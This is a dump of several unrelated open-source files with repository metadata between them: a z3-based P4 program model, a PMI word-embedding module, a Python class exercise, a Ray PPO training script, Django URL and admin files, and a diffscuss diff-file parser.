"T",]), params=[
P4Parameter("in", "hdr", "T", None),])), ])
)
prog_state.declare_global(
P4Declaration("verify", P4Method("verify", type_params=(None, []), params=[
P4Parameter("in", "check", z3.BoolSort(), None),
P4Parameter("in", "toSignal", "error", None),]))
)
prog_state.declare_global(
P4Declaration("NoAction", P4Action("NoAction", params=[], body=BlockStatement([]
) ))
)
prog_state.declare_global(
P4Declaration("match_kind", ["exact", "ternary", "lpm", ])
)
prog_state.declare_global(
P4Declaration("match_kind", ["range", "optional", "selector", ])
)
prog_state.declare_global(
ValueDeclaration("__v1model_version", 20180101, z3_type=z3.BitVecSort(32))
)
prog_state.declare_global(
StructType("standard_metadata_t", prog_state, fields=[("ingress_port", z3.BitVecSort(9)), ("egress_spec", z3.BitVecSort(9)), ("egress_port", z3.BitVecSort(9)), ("instance_type", z3.BitVecSort(32)), ("packet_length", z3.BitVecSort(32)), ("enq_timestamp", z3.BitVecSort(32)), ("enq_qdepth", z3.BitVecSort(19)), ("deq_timedelta", z3.BitVecSort(32)), ("deq_qdepth", z3.BitVecSort(19)), ("ingress_global_timestamp", z3.BitVecSort(48)), ("egress_global_timestamp", z3.BitVecSort(48)), ("mcast_grp", z3.BitVecSort(16)), ("egress_rid", z3.BitVecSort(16)), ("checksum_error", z3.BitVecSort(1)), ("parser_error", "error"), ("priority", z3.BitVecSort(3)), ], type_params=[])
)
prog_state.declare_global(
Enum( "CounterType", ["packets", "bytes", "packets_and_bytes", ])
)
prog_state.declare_global(
Enum( "MeterType", ["packets", "bytes", ])
)
prog_state.declare_global(
P4Extern("counter", type_params=[], methods=[P4Declaration("counter", P4Method("counter", type_params=(None, []), params=[
P4Parameter("none", "size", z3.BitVecSort(32), None),
P4Parameter("none", "type", "CounterType", None),])), P4Declaration("count", P4Method("count", type_params=(None, []), params=[
P4Parameter("in", "index", z3.BitVecSort(32), None),])), ])
)
prog_state.declare_global(
P4Extern("direct_counter", type_params=[], methods=[P4Declaration("direct_counter", P4Method("direct_counter", type_params=(None, []), params=[
P4Parameter("none", "type", "CounterType", None),])), P4Declaration("count", P4Method("count", type_params=(None, []), params=[])), ])
)
prog_state.declare_global(
P4Extern("meter", type_params=[], methods=[P4Declaration("meter", P4Method("meter", type_params=(None, []), params=[
P4Parameter("none", "size", z3.BitVecSort(32), None),
P4Parameter("none", "type", "MeterType", None),])), P4Declaration("execute_meter", P4Method("execute_meter", type_params=(None, [
"T",]), params=[
P4Parameter("in", "index", z3.BitVecSort(32), None),
P4Parameter("out", "result", "T", None),])), ])
)
prog_state.declare_global(
P4Extern("direct_meter", type_params=[
"T",], methods=[P4Declaration("direct_meter", P4Method("direct_meter", type_params=(None, []), params=[
P4Parameter("none", "type", "MeterType", None),])), P4Declaration("read", P4Method("read", type_params=(None, []), params=[
P4Parameter("out", "result", "T", None),])), ])
)
prog_state.declare_global(
P4Extern("register", type_params=[
"T",], methods=[P4Declaration("register", P4Method("register", type_params=(None, []), params=[
P4Parameter("none", "size", z3.BitVecSort(32), None),])), P4Declaration("read", P4Method("read", type_params=(None, []), params=[
P4Parameter("out", "result", "T", None),
P4Parameter("in", "index", z3.BitVecSort(32), None),])), P4Declaration("write", P4Method("write", type_params=(None, []), params=[
P4Parameter("in", "index", z3.BitVecSort(32), None),
P4Parameter("in", "value", "T", None),])), ])
)
prog_state.declare_global(
P4Extern("action_profile", type_params=[], methods=[P4Declaration("action_profile", P4Method("action_profile", type_params=(None, []), params=[
P4Parameter("none", "size", z3.BitVecSort(32), None),])), ])
)
prog_state.declare_global(
P4Declaration("random", P4Method("random", type_params=(None, [
"T",]), params=[
P4Parameter("out", "result", "T", None),
P4Parameter("in", "lo", "T", None),
P4Parameter("in", "hi", "T", None),]))
)
prog_state.declare_global(
P4Declaration("digest", P4Method("digest", type_params=(None, [
"T",]), params=[
P4Parameter("in", "receiver", z3.BitVecSort(32), None),
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
Enum( "HashAlgorithm", ["crc32", "crc32_custom", "crc16", "crc16_custom", "random", "identity", "csum16", "xor16", ])
)
prog_state.declare_global(
P4Declaration("mark_to_drop", P4Method("mark_to_drop", type_params=(None, []), params=[]))
)
prog_state.declare_global(
P4Declaration("mark_to_drop", P4Method("mark_to_drop", type_params=(None, []), params=[
P4Parameter("inout", "standard_metadata", "standard_metadata_t", None),]))
)
prog_state.declare_global(
P4Declaration("hash", P4Method("hash", type_params=(None, [
"O",
"T",
"D",
"M",]), params=[
P4Parameter("out", "result", "O", None),
P4Parameter("in", "algo", "HashAlgorithm", None),
P4Parameter("in", "base", "T", None),
P4Parameter("in", "data", "D", None),
P4Parameter("in", "max", "M", None),]))
)
prog_state.declare_global(
P4Extern("action_selector", type_params=[], methods=[P4Declaration("action_selector", P4Method("action_selector", type_params=(None, []), params=[
P4Parameter("none", "algorithm", "HashAlgorithm", None),
P4Parameter("none", "size", z3.BitVecSort(32), None),
P4Parameter("none", "outputWidth", z3.BitVecSort(32), None),])), ])
)
prog_state.declare_global(
Enum( "CloneType", ["I2E", "E2E", ])
)
prog_state.declare_global(
P4Extern("Checksum16", type_params=[], methods=[P4Declaration("Checksum16", P4Method("Checksum16", type_params=(None, []), params=[])), P4Declaration("get", P4Method("get", type_params=(z3.BitVecSort(16), [
"D",]), params=[
P4Parameter("in", "data", "D", None),])), ])
)
prog_state.declare_global(
P4Declaration("verify_checksum", P4Method("verify_checksum", type_params=(None, [
"T",
"O",]), params=[
P4Parameter("in", "condition", z3.BoolSort(), None),
P4Parameter("in", "data", "T", None),
P4Parameter("in", "checksum", "O", None),
P4Parameter("none", "algo", "HashAlgorithm", None),]))
)
prog_state.declare_global(
P4Declaration("update_checksum", P4Method("update_checksum", type_params=(None, [
"T",
"O",]), params=[
P4Parameter("in", "condition", z3.BoolSort(), None),
P4Parameter("in", "data", "T", None),
P4Parameter("inout", "checksum", "O", None),
P4Parameter("none", "algo", "HashAlgorithm", None),]))
)
prog_state.declare_global(
P4Declaration("verify_checksum_with_payload", P4Method("verify_checksum_with_payload", type_params=(None, [
"T",
"O",]), params=[
P4Parameter("in", "condition", z3.BoolSort(), None),
P4Parameter("in", "data", "T", None),
P4Parameter("in", "checksum", "O", None),
P4Parameter("none", "algo", "HashAlgorithm", None),]))
)
prog_state.declare_global(
P4Declaration("update_checksum_with_payload", P4Method("update_checksum_with_payload", type_params=(None, [
"T",
"O",]), params=[
P4Parameter("in", "condition", z3.BoolSort(), None),
P4Parameter("in", "data", "T", None),
P4Parameter("inout", "checksum", "O", None),
P4Parameter("none", "algo", "HashAlgorithm", None),]))
)
prog_state.declare_global(
P4Declaration("resubmit", P4Method("resubmit", type_params=(None, [
"T",]), params=[
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
P4Declaration("recirculate", P4Method("recirculate", type_params=(None, [
"T",]), params=[
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
P4Declaration("clone", P4Method("clone", type_params=(None, []), params=[
P4Parameter("in", "type", "CloneType", None),
P4Parameter("in", "session", z3.BitVecSort(32), None),]))
)
prog_state.declare_global(
P4Declaration("clone3", P4Method("clone3", type_params=(None, [
"T",]), params=[
P4Parameter("in", "type", "CloneType", None),
P4Parameter("in", "session", z3.BitVecSort(32), None),
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
P4Declaration("truncate", P4Method("truncate", type_params=(None, []), params=[
P4Parameter("in", "length", z3.BitVecSort(32), None),]))
)
prog_state.declare_global(
P4Declaration("assert", P4Method("assert", type_params=(None, []), params=[
P4Parameter("in", "check", z3.BoolSort(), None),]))
)
prog_state.declare_global(
P4Declaration("assume", P4Method("assume", type_params=(None, []), params=[
P4Parameter("in", "check", z3.BoolSort(), None),]))
)
prog_state.declare_global(
P4Declaration("log_msg", P4Method("log_msg", type_params=(None, []), params=[
P4Parameter("none", "msg", z3.StringSort(), None),]))
)
prog_state.declare_global(
P4Declaration("log_msg", P4Method("log_msg", type_params=(None, [
"T",]), params=[
P4Parameter("none", "msg", z3.StringSort(), None),
P4Parameter("in", "data", "T", None),]))
)
prog_state.declare_global(
ControlDeclaration(P4ParserType("Parser", params=[
P4Parameter("none", "b", "packet_in", None),
P4Parameter("out", "parsedHdr", "H", None),
P4Parameter("inout", "meta", "M", None),
P4Parameter("inout", "standard_metadata", "standard_metadata_t", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("VerifyChecksum", params=[
P4Parameter("inout", "hdr", "H", None),
P4Parameter("inout", "meta", "M", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("Ingress", params=[
P4Parameter("inout", "hdr", "H", None),
P4Parameter("inout", "meta", "M", None),
P4Parameter("inout", "standard_metadata", "standard_metadata_t", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("Egress", params=[
P4Parameter("inout", "hdr", "H", None),
P4Parameter("inout", "meta", "M", None),
P4Parameter("inout", "standard_metadata", "standard_metadata_t", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("ComputeChecksum", params=[
P4Parameter("inout", "hdr", "H", None),
P4Parameter("inout", "meta", "M", None),], type_params=[
"H",
"M",]))
)
prog_state.declare_global(
ControlDeclaration(P4ControlType("Deparser", params=[
P4Parameter("none", "b", "packet_out", None),
P4Parameter("in", "hdr", "H", None),], type_params=[
"H",]))
)
prog_state.declare_global(
ControlDeclaration(P4Package("V1Switch", params=[
P4Parameter("none", "p", TypeSpecializer("Parser", "H", "M", ), None),
P4Parameter("none", "vr", TypeSpecializer("VerifyChecksum", "H", "M", ), None),
P4Parameter("none", "ig", TypeSpecializer("Ingress", "H", "M", ), None),
P4Parameter("none", "eg", TypeSpecializer("Egress", "H", "M", ), None),
P4Parameter("none", "ck", TypeSpecializer("ComputeChecksum", "H", "M", ), None),
P4Parameter("none", "dep", TypeSpecializer("Deparser", "H", ), None),],type_params=[
"H",
"M",]))
)
prog_state.declare_global(
HeaderType("H", prog_state, fields=[("a", z3.BitVecSort(8)), ], type_params=[])
)
prog_state.declare_global(
StructType("Headers", prog_state, fields=[("h", "H"), ], type_params=[])
)
prog_state.declare_global(
StructType("Meta", prog_state, fields=[], type_params=[])
)
prog_state.declare_global(
P4Declaration("do_thing", P4Function("do_thing", return_type=z3.BitVecSort(8), params=[
P4Parameter("out", "d", z3.BitVecSort(32), None),], body=BlockStatement([
P4Return(P4Cast(z3.BitVecVal(1, 32), z3.BitVecSort(8))),]
) ) )
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="ingress",
type_params=[],
params=[
P4Parameter("inout", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),
P4Parameter("inout", "sm", "standard_metadata_t", None),],
const_params=[],
body=BlockStatement([
MethodCallStmt(MethodCallExpr("do_thing", [], P4Member("sm", "enq_timestamp"), )),
AssignmentStatement(P4Member(P4Member("h", "h"), "a"), 1),]
),
local_decls=[]
))
)
prog_state.declare_global(
ControlDeclaration(P4Parser(
name="p",
type_params=[],
params=[
P4Parameter("none", "b", "packet_in", None),
P4Parameter("out", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),
P4Parameter("inout", "sm", "standard_metadata_t", None),],
const_params=[],
local_decls=[],
body=ParserTree([
ParserState(name="start", select="accept",
components=[ ]),
])
))
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="vrfy",
type_params=[],
params=[
P4Parameter("inout", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),],
const_params=[],
body=BlockStatement([]
),
local_decls=[]
))
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="update",
type_params=[],
params=[
P4Parameter("inout", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),],
const_params=[],
body=BlockStatement([]
),
local_decls=[]
))
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="egress",
type_params=[],
params=[
P4Parameter("inout", "h", "Headers", None),
P4Parameter("inout", "m", "Meta", None),
P4Parameter("inout", "sm", "standard_metadata_t", None),],
const_params=[],
body=BlockStatement([]
),
local_decls=[]
))
)
prog_state.declare_global(
ControlDeclaration(P4Control(
name="deparser",
type_params=[],
params=[
P4Parameter("none", "b", "packet_out", None),
P4Parameter("in", "h", "Headers", None),],
const_params=[],
body=BlockStatement([]
),
local_decls=[]
))
)
prog_state.declare_global(
InstanceDeclaration("main", "V1Switch", ConstCallExpr("p", ), ConstCallExpr("vrfy", ), ConstCallExpr("ingress", ), ConstCallExpr("egress", ), ConstCallExpr("update", ), ConstCallExpr("deparser", ), )
)
var = prog_state.get_main_function()
return var if isinstance(var, P4Package) else None
| [
"noreply@github.com"
] | p4gauntlet.noreply@github.com |
12631fa3eb7b47872dab382bbdbf156c15689b08 | 1215102b7853653e241e6dfcfc88a0a260aaf3dc | /hyperhyper/pmi.py | f0a385d3a7982cbe0f5086463485244ff486d582 | [
"BSD-2-Clause"
] | permissive | jfilter/hyperhyper | 81cf09763f1b1bebe8b581d4e60a53295babcd77 | 30983a82b1db037408de56bdddde9a5a9508c656 | refs/heads/master | 2023-01-02T00:24:59.259407 | 2020-10-25T21:46:14 | 2020-10-25T21:46:14 | 189,021,107 | 14 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,145 | py | """
implements PMI matrix (Pointwise mutual information)
See: https://en.wikipedia.org/wiki/Pointwise_mutual_information
"""
import heapq
import numpy as np
from gensim import matutils
from scipy.sparse import csr_matrix, dok_matrix
def calc_pmi(counts, cds):
    """
    Calculates e^PMI; PMI without the log().

    counts: sparse word-by-context co-occurrence matrix.
    cds: context-distribution smoothing exponent applied to the context
         counts (1 means no smoothing).
    """
    word_totals = np.array(counts.sum(axis=1))[:, 0]
    context_totals = np.array(counts.sum(axis=0))[0, :]
    if cds != 1:
        context_totals = context_totals ** cds
    grand_total = context_totals.sum()
    inv_words = np.reciprocal(word_totals)
    inv_contexts = np.reciprocal(context_totals)
    pmi = csr_matrix(counts)
    # Scale each row i by 1 / word_count(i) via a sparse diagonal matrix.
    row_scaler = dok_matrix((len(inv_words), len(inv_words)))
    row_scaler.setdiag(inv_words)
    pmi = row_scaler.tocsr().dot(pmi)
    # Scale each column j by 1 / smoothed_context_count(j).
    col_scaler = dok_matrix((len(inv_contexts), len(inv_contexts)))
    col_scaler.setdiag(inv_contexts)
    pmi = pmi.dot(col_scaler.tocsr())
    return pmi * grand_total
def multiply_by_rows(matrix, row_coefs):
    """Scale row i of *matrix* by row_coefs[i] (sparse diagonal multiply)."""
    n = len(row_coefs)
    scaler = dok_matrix((n, n))
    scaler.setdiag(row_coefs)
    return scaler.tocsr().dot(matrix)
def multiply_by_columns(matrix, col_coefs):
    """Scale column j of *matrix* by col_coefs[j] (sparse diagonal multiply)."""
    n = len(col_coefs)
    scaler = dok_matrix((n, n))
    scaler.setdiag(col_coefs)
    return matrix.dot(scaler.tocsr())
class PPMIEmbedding:
    """
    Explicit PPMI representation over a serialized e^PMI matrix.

    log() of the stored values recovers PMI; subtracting log(neg) emulates
    shifted negative sampling, after which negative cells are truncated to
    zero (positive PMI).  With normalize=True every row is L2-normalized so
    that dot products equal cosine similarities.
    """

    def __init__(self, matrix, normalize=True, neg=1):
        self.m = matrix
        # Stored values are e^PMI, so log() recovers PMI.
        self.m.data = np.log(self.m.data)
        if neg is not None:
            # Shift by log(neg), then keep only positive PMI cells.
            self.m.data -= np.log(neg)
            self.m.data[self.m.data < 0] = 0
            self.m.eliminate_zeros()
        if normalize:
            self.normalize()

    def normalize(self):
        """L2-normalize every row of the matrix in place."""
        squared = self.m.copy()
        squared.data **= 2
        inv_norm = np.reciprocal(np.sqrt(np.array(squared.sum(axis=1))[:, 0]))
        scaler = dok_matrix((len(inv_norm), len(inv_norm)))
        scaler.setdiag(inv_norm)
        self.m = scaler.tocsr().dot(self.m)

    def represent(self, w_idx):
        """Return the sparse row vector for word index *w_idx*."""
        return self.m[w_idx, :]

    def similarity(self, w1, w2):
        """Dot product of two word vectors (cosine if rows were normalized)."""
        return self.represent(w1).dot(self.represent(w2).T)[0, 0]

    def most_similar(self, w, n=10):
        """Top-*n* (score, index) pairs for *w* (assumes normalized rows)."""
        scores = self.m.dot(self.represent(w).T).T.tocsr()
        return heapq.nlargest(n, zip(scores.data, scores.indices))

    # TODO: working?
    def most_similar_vectors(self, positives, negatives, topn=10):
        """
        Analogy-style query: rank rows by similarity to the unit mean of the
        positive vectors minus the negative vectors.  Parts adapted from
        gensim's KeyedVectors.most_similar.
        """
        directions = [np.squeeze(self.represent(p).toarray()) for p in positives]
        directions += [-1 * np.squeeze(self.represent(q).toarray()) for q in negatives]
        query = matutils.unitvec(np.array(directions).mean(axis=0)).astype(np.float32)
        dists = self.m.dot(query)
        ranked = matutils.argsort(dists, topn=topn, reverse=True)
        return [(idx, float(dists[idx])) for idx in ranked]
| [
"hi@jfilter.de"
] | hi@jfilter.de |
4086e3b1a38b44ca64c3c26ab771c4058a470927 | c2bdcd5aec95d5c4ac4322f166c2ef9b2b8992f9 | /kurstag_8/loesungen_8/Kreditkarte_Loesung2.py | 68fa57d69d26630f26eb934afd6fa936dafcb8d2 | [] | no_license | softborg/Python_HWZ_Start | 4437c5d8676301db8f4c42b75c98f0cc91320012 | 6361647113365df66e3ad84a0d1d1b563137ebbd | refs/heads/master | 2022-07-21T16:27:30.333598 | 2022-07-12T12:08:37 | 2022-07-12T12:08:37 | 252,724,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | # coding=utf8
# Aufgabe 2 - Kreditkarte
# 1. erstellen sie folgende Klassen 'Kreditkarte', 'Visa' und 'Mastercard
# 2. beim Instanziieren soll die Kartennummer mitgegeben werden, die Kartennummer ist public
# 3. Die Klassen 'Visa' und 'Mastercard' erben von 'Kreditkarte' und haben jeweils einen eignen Initalisierung
# 4. Bei der Initalisierung der Visa Kartennummer wird die Endung "-1944" angefügt
# 5. Bei der Initalisierung der Mastercard Kartennummer wird die Endung "-1234" angefügt
# 6. Instanziieren sie jeweils eine Visa- und ein Mastercard und eine Kreditkarte !
# 7. Geben sie jeweils die Kartennummer aus
class Kreditkarte:
    """A generic credit card; the card number is a public attribute."""

    def __init__(self, kartennr):
        self.kartennr = kartennr


class Visa(Kreditkarte):
    """Visa card: card numbers carry the suffix '-1944'."""

    def __init__(self, kartennr):
        # Delegate to the base initializer instead of duplicating the
        # attribute assignment in every subclass.
        super().__init__(kartennr + "-1944")


class Mastercard(Kreditkarte):
    """Mastercard: card numbers carry the suffix '-1234'."""

    def __init__(self, kartennr):
        super().__init__(kartennr + "-1234")
visa = Visa("412340998")
print(visa.kartennr)
mastercard = Mastercard("77770999")
print(mastercard.kartennr)
kreditkarte = Kreditkarte("1239")
print(kreditkarte.kartennr)
| [
"stefan.berger@softborg.com"
] | stefan.berger@softborg.com |
31fa03847837f428a42b58c029ab3b2371f78651 | 02c6b39399c1cfb434ad718c90bed3d8e6310ed0 | /training/ppo/tune/tune_train_PPO_car.py | dc4022a6f9ce60ae09adfcb96cc19810c33bb75c | [] | no_license | phate09/SafeDRL | 09b8924fa91aa43cf543ea5727ebe4cc8e13c0a5 | 3d4278eaaabb046a90fc1cebd1b5862d63dc5894 | refs/heads/master | 2022-09-17T05:12:28.529329 | 2022-08-29T08:21:32 | 2022-08-29T08:21:32 | 204,663,981 | 8 | 3 | null | 2021-12-02T14:13:46 | 2019-08-27T09:07:04 | Python | UTF-8 | Python | false | false | 3,401 | py | import random
from datetime import datetime
import numpy as np
import ray
from gym.vector.utils import spaces
from ray import tune
from ray.rllib.models import ModelCatalog
from ray.rllib.models.torch.fcnet import FullyConnectedNetwork as TorchFC
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.framework import try_import_torch
from environment.stopping_car import StoppingCar
torch, nn = try_import_torch()
custom_input_space = spaces.Box(low=-np.inf, high=np.inf, shape=(2,), dtype=np.float32)
class TorchCustomModel(TorchModelV2, nn.Module):
    """Example of a PyTorch custom model that just delegates to a fc-net.

    Registered with RLlib's ModelCatalog under the name "my_model"; it wraps
    a fully connected network built on ``custom_input_space`` (2 floats)
    rather than the environment's full observation space — ``forward`` slices
    the incoming observation down to match.
    """

    def __init__(self, obs_space, action_space, num_outputs, model_config, name):
        # NOTE(review): obs_space is intentionally ignored in favor of the
        # module-level custom_input_space — confirm that is the intent.
        TorchModelV2.__init__(self, custom_input_space, action_space, num_outputs, model_config, name)
        nn.Module.__init__(self)
        self.torch_sub_model = TorchFC(custom_input_space, action_space, num_outputs, model_config, name)

    def forward(self, input_dict, state, seq_lens):
        # Keep only the last two observation features and cast to float
        # before delegating to the wrapped fully connected net.
        input_dict["obs"] = input_dict["obs"].float()[:, -2:]
        fc_out, _ = self.torch_sub_model(input_dict, state, seq_lens)
        return fc_out, []

    def value_function(self):
        # Flatten the sub-model's value output to a 1-D tensor.
        return torch.reshape(self.torch_sub_model.value_function(), [-1])
def get_PPO_config(seed, use_gpu=1):
    """Build the RLlib PPO config dict for the StoppingCar environment.

    seed: RNG seed forwarded to RLlib for reproducibility.
    use_gpu: value for "num_gpus" (may be fractional, e.g. 0.5).

    Side effect: registers TorchCustomModel with the ModelCatalog under the
    name "my_model" so the config's custom_model entry resolves.
    """
    ModelCatalog.register_custom_model("my_model", TorchCustomModel)
    config = {"env": StoppingCar,  #
              "model": {"custom_model": "my_model", "fcnet_hiddens": [64, 64], "fcnet_activation": "relu"},  # model config," "custom_model": "my_model"
              "vf_share_layers": False,
              "lr": 5e-4,
              "num_gpus": use_gpu,
              "vf_clip_param": 100000,
              "grad_clip": 2500,
              "clip_rewards": 5,
              "num_workers": 3,  # parallelism
              "num_envs_per_worker": 10,
              "batch_mode": "complete_episodes",
              "evaluation_interval": 10,
              "evaluation_num_episodes": 20,
              "use_gae": True,  #
              "lambda": 0.95,  # gae lambda param
              "num_sgd_iter": 10,
              "train_batch_size": 4000,
              "sgd_minibatch_size": 1024,
              "rollout_fragment_length": 1000,
              "framework": "torch",
              "horizon": 1000,
              "seed": seed,
              "evaluation_config": {
                  # Example: overriding env_config, exploration, etc:
                  # "env_config": {...},
                  # Evaluation rollouts are deterministic (no exploration).
                  "explore": False
              },
              # grid_search values make ray.tune expand one trial per combination.
              "env_config": {"cost_fn": tune.grid_search([0]),
                             "epsilon_input": tune.grid_search([0])}  #
              }
    return config
if __name__ == "__main__":
    seed = 1234
    # Seed every RNG in play (python, numpy, torch) for reproducibility.
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    ray.init(local_mode=True, include_dashboard=True, log_to_driver=False)
    config = get_PPO_config(use_gpu=0.5, seed=seed)
    # NOTE(review): datetime_str is computed but never used below — confirm
    # whether it was meant to be part of the experiment name.
    datetime_str = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
    tune.run(
        "PPO",
        # A trial stops once either threshold is reached.
        stop={"info/num_steps_trained": 2e8, "episode_reward_mean": -2e1},
        config=config,
        name=f"tune_PPO_stopping_car",
        checkpoint_freq=10,
        checkpoint_at_end=True,
        log_to_file=True,
        # resume="PROMPT",
        verbose=1,
        num_samples=10
    )
    ray.shutdown()
| [
"phate09@hotmail.it"
] | phate09@hotmail.it |
5ca47a8f2ebd168cadb146b40760ae74bf5b65dd | a913684fe348945c2b79786115fd392945cfcf72 | /user/urls.py | 314e6f4677e2c1433fef3c06f975cb168ecb7b44 | [] | no_license | LukaszMalucha/docker-django | 0332c4153d50add049db36479079ace2c664bea2 | 4b34f835b7ea3f8f9baa9956943b4ba9111f39fa | refs/heads/master | 2023-02-03T05:56:10.059009 | 2020-12-19T16:55:06 | 2020-12-19T16:55:06 | 322,545,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | from django.urls import path
from user import views
app_name = 'user'
urlpatterns = [
path("create/", views.CreateUserView.as_view(), name="create"),
path("authenticate/", views.CreateTokenView.as_view(), name="authenticate"),
path("my-account/", views.ManageUserView.as_view(), name="my-account"),
path("current-user/", views.CurrentUserApiView.as_view(), name="current-user"),
]
| [
"lucasmalucha@gmail.com"
] | lucasmalucha@gmail.com |
8f5ad21cd04e55f5a29773af97e8c3682ed21a87 | 02843d06b2a19b1d864561ad0c960c81dc11d5dd | /apps/enquiry/admin.py | 21b06c4de52f39d25c2cf2017c69c72d79403956 | [] | no_license | hqpr/amazing-asia | b0eb450937d007f6beed96b2e5ff09e2200b0cad | 5a749c77514d97359a3eaa7207943563cd2a7c9a | refs/heads/master | 2021-04-25T16:33:24.205942 | 2017-11-30T17:05:27 | 2017-11-30T17:05:27 | 108,191,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from django.contrib import admin
from .models import Enquiry
admin.site.register(Enquiry)
| [
"adubnyak@gmail.com"
] | adubnyak@gmail.com |
bd52bfd00c8d7b8e6a83dda80689159e389c7d39 | 3a57805be67d568bc516cc821deb3d912dbf87ad | /diffscuss/walker.py | feabedbadb58dae353f35514507b42580832274f | [
"MIT"
] | permissive | tomheon/diffscuss | 8e0ee331cc37dd7a3607e2a434fb59ea9ca69d3f | 53f2d001bd3a5cb80c6ada16b4e570afd1989a09 | refs/heads/master | 2023-08-15T23:05:59.277846 | 2021-06-17T21:19:39 | 2021-06-17T21:19:39 | 8,643,720 | 39 | 3 | MIT | 2018-03-21T16:33:17 | 2013-03-08T05:18:43 | Python | UTF-8 | Python | false | false | 4,486 | py | from collections import namedtuple
import re
# Raised when a comment's nesting level changes illegally within one part.
class BadNestingException(Exception):
    pass

# Raised when a comment header contains no "author:" line.
class MissingAuthorException(Exception):
    pass

# Raised when a comment has a header but no body lines.
class EmptyCommentException(Exception):
    pass

# Raised when a diffscuss comment appears inside a diff header.
class CommentInHeaderException(Exception):
    pass
DIFF_HEADER = 'DIFF_HEADER'
DIFF = 'DIFF'
COMMENT_HEADER = 'COMMENT_HEADER'
COMMENT_BODY = 'COMMENT_BODY'
def walk(fil):
    """
    Walk a Diffscuss file, yielding either:

    (DIFF, line) for each line that is part of a diff,

    (DIFF_HEADER, line) for each diff header line (e.g. Index lines,
    range lines),

    (COMMENT_HEADER, line) for each diffscuss comment header line, or

    (COMMENT_BODY, line) for each diffscuss body line.

    @fil: a file-like object containing Diffscuss.

    Raises:

    MissingAuthorException: if there's no author header at the start
    of a comment.

    BadNestingException: if a comment is improperly nested.

    EmptyCommentException: if a comment has no body.

    CommentInHeaderException: if a comment appears in a diff header.
    """
    line = fil.readline()
    # True while we are inside a diff header (from a non-diff line until the
    # next @@ range line) — comments are illegal there.
    in_header = False
    # allow the normal magic header lines (such as encoding), but
    # don't consider them part of the diffscuss file.
    while line.startswith("#") and not _is_diffscuss_line(line):
        line = fil.readline()
    while True:
        if not line:
            break
        if _is_diffscuss_line(line):
            if in_header:
                raise CommentInHeaderException()
            # _read_comment consumes the whole comment and hands back the
            # first line after it.
            tagged_comment_lines, line = _read_comment(line, fil)
            for tag, comment_line in tagged_comment_lines:
                yield (tag, comment_line)
            # continue so we don't read another line at the bottom
            continue
        elif in_header or _is_not_diff_line(line):
            # check for non-diff line has to come second, since the
            # --- and +++ in the header will read as diff lines
            # otherwise
            yield (DIFF_HEADER, line)
            # a range line ends the header section
            in_header = not _is_range_line(line)
        else:
            yield (DIFF, line)
        line = fil.readline()
def _read_comment(line, fil):
    """Consume one diffscuss comment (header then body) starting at *line*.

    Returns (tagged_lines, next_line), where tagged_lines pairs each comment
    line with COMMENT_HEADER or COMMENT_BODY, and next_line is the first
    line after the comment.  Validates the header and body as it goes.
    """
    header_lines, line = _read_header(line, fil)
    _check_header(header_lines)
    body_lines, line = _read_body(line, fil)
    _check_body(body_lines)
    tagged = [(COMMENT_HEADER, hl) for hl in header_lines]
    tagged.extend((COMMENT_BODY, bl) for bl in body_lines)
    return (tagged, line)
def _check_body(body_lines):
    """Raise EmptyCommentException when a comment has no body lines."""
    if body_lines:
        return
    raise EmptyCommentException()
def _check_header(header_lines):
    """Require an author line before any other non-empty header line.

    Raises MissingAuthorException if a substantive header line precedes the
    author line, or if no author line exists at all.
    """
    for candidate in header_lines:
        if _is_author_line(candidate):
            return
        if _is_empty_header(candidate):
            continue
        raise MissingAuthorException()
    raise MissingAuthorException()
def _level(line):
    """Nesting depth of a comment line: marker length minus one.

    Returns None for lines that are neither header nor body.
    """
    for matcher in (_is_header, _is_body):
        m = matcher(line)
        if m:
            return len(m.group(1)) - 1
    return None
def _read_header(line, fil):
    """Read the run of comment-header lines starting at *line*."""
    return _read_comment_part(line, fil, _is_header)
def _read_body(line, fil):
    """Read the run of comment-body lines starting at *line*."""
    return _read_comment_part(line, fil, _is_body)
def _read_comment_part(line, fil, pred):
    """Collect consecutive lines satisfying *pred* at one nesting level.

    The level is fixed by the first line; a level change before *pred*
    stops matching raises BadNestingException.  Returns
    (collected_lines, first_non_matching_line).
    """
    collected = []
    expected_level = _level(line)
    while pred(line):
        if _level(line) != expected_level:
            raise BadNestingException()
        collected.append(line)
        line = fil.readline()
    return collected, line
# Comment header marker: '#' plus one or more '*', then a space or EOL.
HEADER_RE = re.compile(r'^(#[*]+)( |$)')
# A header line consisting solely of the marker and trailing whitespace.
EMPTY_HEADER_RE = re.compile(r'^(#[*]+)\s*$')

def _is_header(line):
    # Returns the match object (not a bool): _level() reads group(1).
    return HEADER_RE.match(line)

def _is_empty_header(line):
    return EMPTY_HEADER_RE.match(line)
# Header line carrying the comment author, e.g. '#* author: alice'.
AUTHOR_RE = re.compile(r'^(#[*]+) author: ')

def _is_author_line(line):
    return AUTHOR_RE.match(line)
# Comment body marker: '#' plus one or more '-', then a space or EOL.
BODY_RE = re.compile(r'^(#[-]+)( |$)')

def _is_body(line):
    # Returns the match object (not a bool): _level() reads group(1).
    return BODY_RE.match(line)
